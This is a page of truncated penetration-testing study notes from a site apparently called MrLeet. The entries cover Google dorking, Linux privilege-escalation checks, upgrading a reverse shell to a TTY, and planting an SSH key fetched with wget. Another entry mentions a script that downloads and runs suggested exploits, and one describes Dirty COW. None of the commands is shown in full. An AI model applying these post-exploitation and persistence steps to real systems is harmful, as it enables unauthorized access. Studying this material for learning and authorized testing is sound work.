Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Google Hacking

Google search to find website sub domains

Google filetype, and intitle
intitle:"netbotz appliance" "OK" -filetype:pdf

Google inurl

Google Hacking Database:

Score: 0

Set the Target IP Address to the $ip system variable
export ip=

Find the location of a file
locate sbd.exe

Search through directories in the $PATH environment variable
which sbd

Find a search for a file that contains a specific string in it’s name:
find / -name sbd\*

Show active int...

Score: 0

Scripts to run

The following script runs exploit suggester and automatically downloads and executes suggested exploits:

Other scripts:
wget https://raw...

Score: 0

Linux elevation of privileges, manual testing
Things to look: Miss-configured services (cronjobs), incorrect file permissions (exportfs, sudo), miss-configured environment ($PATH), binary with SUID bit, software or OS with known vulnerabilities.

First try simple sudo:
$ sudo su -

What can we run with sudo?
$ sudo -l

Try su as all users ...

Score: 1

Post exploitation
Get a TTY shell after a reverse shell connection
$ python -c 'import pty;pty.spawn("/bin/bash")'
Set PATH TERM and SHELL if missing:
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash

Add public key to authorized keys:
$ echo $(wget https://A...

Score: 0

Why is it called the Dirty COW bug?
"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the ...

Score: 0